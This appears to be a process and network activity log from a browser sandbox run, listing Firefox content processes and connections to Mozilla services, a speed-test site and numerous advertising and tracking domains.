/usr/libexec/goa-identity-service

[/usr/libexec/goa-identity-service]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 6 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {5395e846-9fea-4f06-be29-1229bc93cdeb} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 7 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {0603e019-1741-4ee6-a8b0-03178548d4ab} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 8 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {2d5a96b3-df81-4c20-95ef-a07935a9b694} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 9 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {8f9c61cc-d9f3-47d8-8d98-46b946bfdfa0} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 10 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {639ccc4d-dbf2-45f1-bf30-cc5e75938361} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 11 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {b2abd9a5-12ba-4b05-aebe-fc79337e2280} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 12 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {4813369f-df97-4c76-82c8-1e6131a8e35b} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 13 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {1df57a52-dccd-491d-a125-007baa38f4d5} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 14 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {8fb3a22a-2fbf-4291-bb4d-9181ff22c41f} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 15 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {abaf5043-0722-4e71-9987-1598f18449fc} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 16 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {441418db-9df1-433c-babb-f07f57eb7427} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 17 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {186bc049-c40b-4b99-b081-1097b83731da} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 18 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {373ba17d-ecd7-4589-bb6a-c5fa0c00eb0b} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 19 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {1e049211-18e1-4a15-a497-78e630bbd933} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 20 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {2ef7517e-b2fe-4432-b60e-88a0d8ef941e} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 21 -isForBrowser -prefsLen 29581 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {7caddee6-8444-4eed-af98-e045512979b1} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 22 -isForBrowser -prefsLen 29705 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {d74b435b-0237-412b-b8f9-68bbbec5a7e0} 1486 true tab]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 1.1.1.1:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 spocs.getpocket.com tcp
US 34.117.188.166:443 spocs.getpocket.com tcp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.117.188.166:443 spocs.getpocket.com udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.prod.mozaws.net udp
US 1.1.1.1:53 push.services.mozilla.com udp
US 1.1.1.1:53 push.services.mozilla.com udp
US 44.238.192.228:443 shavar.services.mozilla.com tcp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 support.mozilla.org udp
US 1.1.1.1:53 support.mozilla.org udp
US 1.1.1.1:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 34.149.128.2:443 support.mozilla.org tcp
US 1.1.1.1:53 www.google.com udp
US 1.1.1.1:53 www.google.com udp
GB 172.217.169.68:443 www.google.com tcp
GB 172.217.169.68:443 www.google.com udp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 1.1.1.1:53 ciscobinary.openh264.org udp
US 1.1.1.1:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 1.1.1.1:53 play.google.com udp
US 1.1.1.1:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 1.1.1.1:53 consent.google.com udp
US 1.1.1.1:53 consent.google.com udp
GB 216.58.212.238:443 consent.google.com tcp
GB 216.58.212.238:443 consent.google.com udp
US 1.1.1.1:53 locate.measurementlab.net udp
US 1.1.1.1:53 locate.measurementlab.net udp
GB 142.250.187.211:443 locate.measurementlab.net tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 172.217.169.68:443 www.google.com udp
US 1.1.1.1:53 www.speedtest.net udp
US 1.1.1.1:53 www.speedtest.net udp
US 1.1.1.1:53 www.speedtest.net.cdn.cloudflare.net udp
US 104.17.148.22:443 www.speedtest.net tcp
US 1.1.1.1:53 cdn.ziffstatic.com udp
US 1.1.1.1:53 cdn.ziffstatic.com udp
US 1.1.1.1:53 b.cdnst.net udp
US 1.1.1.1:53 b.cdnst.net udp
US 1.1.1.1:53 cdn.tailwindcss.com udp
US 1.1.1.1:53 cdn.tailwindcss.com udp
US 1.1.1.1:53 www.pcmag.com udp
US 1.1.1.1:53 www.pcmag.com udp
US 1.1.1.1:53 unpkg.com udp
US 1.1.1.1:53 unpkg.com udp
GB 95.101.129.235:443 cdn.ziffstatic.com tcp
US 151.101.66.219:443 b.cdnst.net tcp
US 151.101.66.219:443 b.cdnst.net tcp
US 151.101.66.219:443 b.cdnst.net tcp
US 151.101.66.219:443 b.cdnst.net tcp
US 104.22.20.144:443 cdn.tailwindcss.com tcp
US 104.16.21.118:443 www.pcmag.com tcp
US 104.17.245.203:443 unpkg.com tcp
US 104.17.245.203:443 unpkg.com tcp
US 104.17.245.203:443 unpkg.com tcp
US 104.16.21.118:443 www.pcmag.com udp
GB 95.101.129.235:443 cdn.ziffstatic.com udp
US 1.1.1.1:53 cdn.cookielaw.org udp
US 1.1.1.1:53 cdn.cookielaw.org udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 1.1.1.1:53 c.amazon-adsystem.com udp
US 1.1.1.1:53 c.amazon-adsystem.com udp
US 1.1.1.1:53 d1ykf07e75w7ss.cloudfront.net udp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 1.1.1.1:53 diffuser-cdn.app-us1.com udp
US 1.1.1.1:53 diffuser-cdn.app-us1.com udp
US 104.18.128.216:443 diffuser-cdn.app-us1.com tcp
US 1.1.1.1:53 geolocation.onetrust.com udp
US 1.1.1.1:53 geolocation.onetrust.com udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 1.1.1.1:53 cdn.static.zdbb.net udp
US 1.1.1.1:53 cdn.static.zdbb.net udp
US 1.1.1.1:53 e96286.g.akamaiedge.net udp
GB 104.86.111.83:443 cdn.static.zdbb.net tcp
US 1.1.1.1:53 prism.app-us1.com udp
US 1.1.1.1:53 prism.app-us1.com udp
US 1.1.1.1:53 config.aps.amazon-adsystem.com udp
US 1.1.1.1:53 config.aps.amazon-adsystem.com udp
US 104.17.31.174:443 prism.app-us1.com tcp
US 1.1.1.1:53 securepubads.g.doubleclick.net udp
US 1.1.1.1:53 securepubads.g.doubleclick.net udp
GB 52.84.90.126:443 config.aps.amazon-adsystem.com tcp
GB 216.58.204.66:443 securepubads.g.doubleclick.net tcp
GB 216.58.204.66:443 securepubads.g.doubleclick.net udp
US 1.1.1.1:53 trackcmp.net udp
US 1.1.1.1:53 trackcmp.net udp
US 104.18.34.214:443 trackcmp.net tcp
US 1.1.1.1:53 region1.google-analytics.com udp
US 1.1.1.1:53 region1.google-analytics.com udp
US 1.1.1.1:53 zdbb.net udp
US 1.1.1.1:53 gurgle.speedtest.net udp
US 1.1.1.1:53 gurgle.speedtest.net udp
US 1.1.1.1:53 rp.liadm.com udp
US 1.1.1.1:53 rp.liadm.com udp
IE 63.33.101.247:443 zdbb.net tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 1.1.1.1:53 gurgle.zdbb.net udp
US 34.205.102.96:443 rp.liadm.com tcp
US 3.233.164.234:443 gurgle.speedtest.net tcp
US 1.1.1.1:53 tags.crwdcntrl.net udp
US 1.1.1.1:53 tags.crwdcntrl.net udp
US 1.1.1.1:53 cdn.hadronid.net udp
US 1.1.1.1:53 cdn.hadronid.net udp
US 1.1.1.1:53 cdn.id5-sync.com udp
US 1.1.1.1:53 cdn.id5-sync.com udp
US 216.239.34.36:443 region1.google-analytics.com udp
GB 18.245.143.58:443 tags.crwdcntrl.net tcp
US 104.22.53.173:443 cdn.hadronid.net tcp
US 104.22.53.86:443 cdn.id5-sync.com tcp
US 1.1.1.1:53 bcp.crwdcntrl.net udp
US 1.1.1.1:53 bcp.crwdcntrl.net udp
US 1.1.1.1:53 id.hadron.ad.gt udp
US 1.1.1.1:53 id.hadron.ad.gt udp
IE 54.77.210.40:443 bcp.crwdcntrl.net tcp
US 104.22.4.69:443 id.hadron.ad.gt tcp
US 104.22.4.69:443 id.hadron.ad.gt tcp
US 1.1.1.1:53 gurgle.zdbb.net udp
US 3.233.164.234:443 gurgle.speedtest.net tcp
US 1.1.1.1:53 aax.amazon-adsystem.com udp
US 1.1.1.1:53 aax.amazon-adsystem.com udp
US 1.1.1.1:53 d1jvc9b8z3vcjs.cloudfront.net udp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 1.1.1.1:53 btlr.sharethrough.com udp
US 1.1.1.1:53 btlr.sharethrough.com udp
US 1.1.1.1:53 ib.adnxs.com udp
US 1.1.1.1:53 ib.adnxs.com udp
US 1.1.1.1:53 htlb.casalemedia.com udp
US 1.1.1.1:53 htlb.casalemedia.com udp
US 1.1.1.1:53 bidder.criteo.com udp
US 1.1.1.1:53 bidder.criteo.com udp
US 1.1.1.1:53 hbopenbid.pubmatic.com udp
US 1.1.1.1:53 hbopenbid.pubmatic.com udp
US 1.1.1.1:53 btlr-eu-central-1.sharethrough.com udp
US 1.1.1.1:53 c2shb.pubgw.yahoo.com udp
US 1.1.1.1:53 c2shb.pubgw.yahoo.com udp
US 172.64.151.101:443 htlb.casalemedia.com tcp
US 1.1.1.1:53 bidder.nl3.vip.prod.criteo.com udp
US 1.1.1.1:53 rtb.openx.net udp
US 1.1.1.1:53 rtb.openx.net udp
US 1.1.1.1:53 hbopenbid-lhrc.pubmnet.com udp
IE 54.246.194.93:443 c2shb.pubgw.yahoo.com tcp
IE 54.246.194.93:443 c2shb.pubgw.yahoo.com tcp
IE 54.246.194.93:443 c2shb.pubgw.yahoo.com tcp
IE 54.246.194.93:443 c2shb.pubgw.yahoo.com tcp
IE 54.246.194.93:443 c2shb.pubgw.yahoo.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 1.1.1.1:53 fastlane.rubiconproject.com udp
US 1.1.1.1:53 fastlane.rubiconproject.com udp
US 35.227.252.103:443 rtb.openx.net tcp
NL 185.64.189.112:443 hbopenbid.pubmatic.com tcp
US 1.1.1.1:53 a.ad.gt udp
US 1.1.1.1:53 a.ad.gt udp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
US 104.22.4.69:443 a.ad.gt tcp
US 1.1.1.1:53 jogger.zdbb.net udp
US 1.1.1.1:53 jogger.zdbb.net udp
US 1.1.1.1:53 tags.bkrtx.com udp
US 1.1.1.1:53 tags.bkrtx.com udp
US 1.1.1.1:53 idsync.rlcdn.com udp
US 1.1.1.1:53 idsync.rlcdn.com udp
US 3.234.195.2:443 jogger.zdbb.net tcp
US 35.244.174.68:443 idsync.rlcdn.com tcp
US 172.64.151.101:443 htlb.casalemedia.com udp
US 1.1.1.1:53 e5529.g.akamaiedge.net udp
US 1.1.1.1:53 cm.g.doubleclick.net udp
US 1.1.1.1:53 cm.g.doubleclick.net udp
US 35.227.252.103:443 rtb.openx.net udp
FR 23.51.103.239:443 tags.bkrtx.com tcp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 1.1.1.1:53 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedlon.hyperoptic.com udp
US 1.1.1.1:53 speedlon.hyperoptic.com udp
US 1.1.1.1:53 speedtest.upp.com.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.upp.com.prod.hosts.ooklaserver.net udp
US 3.234.195.2:443 jogger.zdbb.net tcp
US 1.1.1.1:53 speedtest-1.london.network.youfibre.com.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest-1.london.network.youfibre.com.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.thn.lon.network.as201838.net.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.thn.lon.network.as201838.net.prod.hosts.ooklaserver.net udp
FR 23.51.103.239:443 tags.bkrtx.com tcp
US 1.1.1.1:53 speedtest.swishfibre.com.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest02a.web.zen.net.uk.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.swishfibre.com.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest02a.web.zen.net.uk.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest-lon.retn.net.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest-lon.retn.net.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 st-1.fibrenest.net.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 st-1.fibrenest.net.prod.hosts.ooklaserver.net udp
US 1.1.1.1:53 speedtest.swishfibre.com udp
US 1.1.1.1:53 speedtest-lon.retn.net udp
US 1.1.1.1:53 st-1.fibrenest.net udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 35.244.174.68:443 idsync.rlcdn.com udp
US 1.1.1.1:53 speedtest-lon.retn.net udp
US 1.1.1.1:53 speedtest.swishfibre.com udp
US 1.1.1.1:53 st-1.fibrenest.net udp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 45.10.101.252:8080 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net tcp
GB 152.37.112.6:8080 speedlon.hyperoptic.com tcp
GB 193.3.26.19:8080 speedtest.upp.com.prod.hosts.ooklaserver.net tcp
GB 51.148.82.21:8080 speedtest02a.web.zen.net.uk.prod.hosts.ooklaserver.net tcp
GB 185.82.8.1:8080 speedtest-lon.retn.net.prod.hosts.ooklaserver.net tcp
GB 31.22.12.17:8080 speedtest.swishfibre.com.prod.hosts.ooklaserver.net tcp
GB 185.241.227.127:8080 st-1.fibrenest.net.prod.hosts.ooklaserver.net tcp
US 1.1.1.1:53 stags.bluekai.com udp
US 1.1.1.1:53 stags.bluekai.com udp
US 1.1.1.1:53 e9126.x.akamaiedge.net udp
US 1.1.1.1:53 aa.agkn.com udp
US 1.1.1.1:53 aa.agkn.com udp
GB 104.115.33.68:443 stags.bluekai.com tcp
GB 45.10.101.252:8080 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net tcp
US 1.1.1.1:53 ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com udp
IE 54.229.132.244:443 aa.agkn.com tcp
US 1.1.1.1:53 static.criteo.net udp
US 1.1.1.1:53 static.criteo.net udp
NL 178.250.1.3:443 static.criteo.net tcp
US 1.1.1.1:53 gum.criteo.com udp
US 1.1.1.1:53 gum.criteo.com udp
US 1.1.1.1:53 id5-sync.com udp
US 1.1.1.1:53 id5-sync.com udp
US 1.1.1.1:53 idx.liadm.com udp
US 1.1.1.1:53 idx.liadm.com udp
US 1.1.1.1:53 ib.anycast.adnxs.com udp
US 1.1.1.1:53 acdn.adnxs.com udp
US 1.1.1.1:53 acdn.adnxs.com udp
NL 178.250.1.11:443 gum.criteo.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
DE 141.95.33.120:443 id5-sync.com tcp
US 1.1.1.1:53 ookla-d.openx.net udp
US 1.1.1.1:53 ookla-d.openx.net udp
US 1.1.1.1:53 idx.cph.liveintent.com udp
US 1.1.1.1:53 ads.pubmatic.com udp
US 1.1.1.1:53 js-sec.indexww.com udp
US 1.1.1.1:53 js-sec.indexww.com udp
US 1.1.1.1:53 eus.rubiconproject.com udp
US 1.1.1.1:53 eus.rubiconproject.com udp
US 1.1.1.1:53 e6115.g.akamaiedge.net udp
US 107.21.218.133:443 idx.liadm.com tcp
US 35.244.159.8:443 ookla-d.openx.net tcp
US 1.1.1.1:53 e6603.g.akamaiedge.net udp
US 1.1.1.1:53 e8960.b.akamaiedge.net udp
US 172.64.149.180:443 js-sec.indexww.com tcp
GB 2.18.108.180:443 acdn.adnxs.com tcp
GB 23.219.196.188:443 ads.pubmatic.com tcp
GB 2.22.5.61:443 eus.rubiconproject.com tcp
US 1.1.1.1:53 lb.eu-1-id5-sync.com udp
US 1.1.1.1:53 lb.eu-1-id5-sync.com udp
DE 141.95.33.120:443 lb.eu-1-id5-sync.com tcp
US 35.244.159.8:443 ookla-d.openx.net udp
DE 141.95.33.120:443 lb.eu-1-id5-sync.com tcp
US 1.1.1.1:53 image6.pubmatic.com udp
US 1.1.1.1:53 image6.pubmatic.com udp
GB 93.113.26.250:8080 speedtest.thn.lon.network.as201838.net.prod.hosts.ooklaserver.net tcp
GB 45.92.46.45:8080 speedtest-1.london.network.youfibre.com.prod.hosts.ooklaserver.net tcp
US 1.1.1.1:53 pugm-amsfpairbc.pubmnet.com udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 1.1.1.1:53 dis.criteo.com udp
US 1.1.1.1:53 dis.criteo.com udp
US 1.1.1.1:53 sync.crwdcntrl.net udp
US 1.1.1.1:53 sync.crwdcntrl.net udp
US 1.1.1.1:53 cr.frontend.weborama.fr udp
US 1.1.1.1:53 cr.frontend.weborama.fr udp
US 1.1.1.1:53 widget.nl3.vip.prod.criteo.com udp
US 1.1.1.1:53 mwzeom.zeotap.com udp
US 1.1.1.1:53 mwzeom.zeotap.com udp
US 1.1.1.1:53 aax-eu.amazon-adsystem.com udp
US 1.1.1.1:53 aax-eu.amazon-adsystem.com udp
US 1.1.1.1:53 um.simpli.fi udp
NL 185.89.210.153:443 ib.adnxs.com tcp
US 1.1.1.1:53 cms.quantserve.com udp
US 1.1.1.1:53 cms.quantserve.com udp
US 1.1.1.1:53 x.bidswitch.net udp
US 1.1.1.1:53 x.bidswitch.net udp
US 1.1.1.1:53 dsp.adfarm1.adition.com udp
US 1.1.1.1:53 dsp.adfarm1.adition.com udp
IE 18.202.12.177:443 sync.crwdcntrl.net tcp
US 1.1.1.1:53 match.adsrvr.org udp
US 1.1.1.1:53 match.adsrvr.org udp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
US 1.1.1.1:53 t.adx.opera.com udp
US 1.1.1.1:53 t.adx.opera.com udp
NL 178.250.1.9:443 dis.criteo.com tcp
US 1.1.1.1:53 c1.adform.net udp
US 1.1.1.1:53 c1.adform.net udp
US 104.22.50.98:443 mwzeom.zeotap.com tcp
US 1.1.1.1:53 sync.srv.stackadapt.com udp
US 1.1.1.1:53 sync.srv.stackadapt.com udp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 1.1.1.1:53 um.simpli.fi udp
US 1.1.1.1:53 user-data-eu.bidswitch.net udp
US 1.1.1.1:53 ad.mrtnsvr.com udp
US 1.1.1.1:53 ad.mrtnsvr.com udp
DE 91.228.74.244:443 cms.quantserve.com tcp
US 1.1.1.1:53 sync-tm.everesttech.net udp
US 1.1.1.1:53 sync-tm.everesttech.net udp
DE 85.114.159.93:443 dsp.adfarm1.adition.com tcp
US 1.1.1.1:53 pr-bh.ybp.yahoo.com udp
US 1.1.1.1:53 pr-bh.ybp.yahoo.com udp
US 3.33.220.150:443 match.adsrvr.org tcp
US 1.1.1.1:53 outspot2-ams.adx.opera.com udp
US 1.1.1.1:53 track.adformnet.akadns.net udp
US 1.1.1.1:53 ups.analytics.yahoo.com udp
US 1.1.1.1:53 ups.analytics.yahoo.com udp
US 54.157.150.224:443 sync.srv.stackadapt.com tcp
US 1.1.1.1:53 creativecdn.com udp
US 1.1.1.1:53 pixel-sync.sitescout.com udp
US 1.1.1.1:53 pixel-sync.sitescout.com udp
US 1.1.1.1:53 pubmatic-match.dotomi.com udp
US 1.1.1.1:53 pubmatic-match.dotomi.com udp
NL 34.91.62.186:443 um.simpli.fi tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 1.1.1.1:53 h2.shared.global.fastly.net udp
US 1.1.1.1:53 image2.pubmatic.com udp
US 1.1.1.1:53 image2.pubmatic.com udp
IE 54.247.56.69:443 pr-bh.ybp.yahoo.com tcp
US 1.1.1.1:53 token.rubiconproject.com udp
US 1.1.1.1:53 token.rubiconproject.com udp
US 1.1.1.1:53 ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud udp
NL 82.145.213.8:443 t.adx.opera.com tcp
DK 37.157.5.133:443 c1.adform.net tcp
US 1.1.1.1:53 creativecdn.com udp
US 34.36.216.150:443 pixel-sync.sitescout.com tcp
NL 64.158.223.137:443 pubmatic-match.dotomi.com tcp
US 1.1.1.1:53 pug-ams-bc.pubmnet.com udp
US 151.101.130.49:443 sync-tm.everesttech.net tcp
US 1.1.1.1:53 pixel.rubiconproject.net.akadns.net udp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
NL 185.184.8.90:443 creativecdn.com tcp
US 34.111.129.221:443 cr.frontend.weborama.fr udp
NL 198.47.127.205:443 image2.pubmatic.com tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
NL 69.173.156.148:443 token.rubiconproject.com tcp
US 1.1.1.1:53 simage2.pubmatic.com udp
US 1.1.1.1:53 simage2.pubmatic.com udp
US 1.1.1.1:53 pug-lhr-bc.pubmnet.com udp
US 1.1.1.1:53 idsync.frontend.weborama.fr udp
US 1.1.1.1:53 idsync.frontend.weborama.fr udp
GB 185.64.191.210:443 simage2.pubmatic.com tcp
GB 185.64.191.210:443 simage2.pubmatic.com tcp
US 34.111.131.239:443 idsync.frontend.weborama.fr tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
US 1.1.1.1:53 sonata-notifications.taptapnetworks.com udp
US 1.1.1.1:53 sonata-notifications.taptapnetworks.com udp
